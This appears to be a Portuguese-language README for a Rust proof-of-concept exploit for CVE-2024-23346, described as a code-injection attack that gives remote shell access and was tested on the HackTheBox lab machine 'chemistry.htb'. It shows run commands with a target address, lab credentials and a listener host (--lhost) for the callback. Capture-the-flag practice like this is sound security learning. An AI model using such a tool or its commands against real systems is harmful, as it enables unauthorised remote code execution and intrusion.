
Um exploit em Rust para CVE-2024-23346 que funciona como um "terminal" (testado em chemistry.htb)
Um script de exploração em Rust para CVE-2024-23346.
Conforme mostrado abaixo, o POC utiliza a vulnerabilidade de injeção de código e executa comandos remotos de shell como em um Terminal.
Passos para executar o exploit:
Cargo
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19OU
cargo build -r (o binário estará em target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19O script de exploração é inspirado no Python Scripting Expert MAWK0235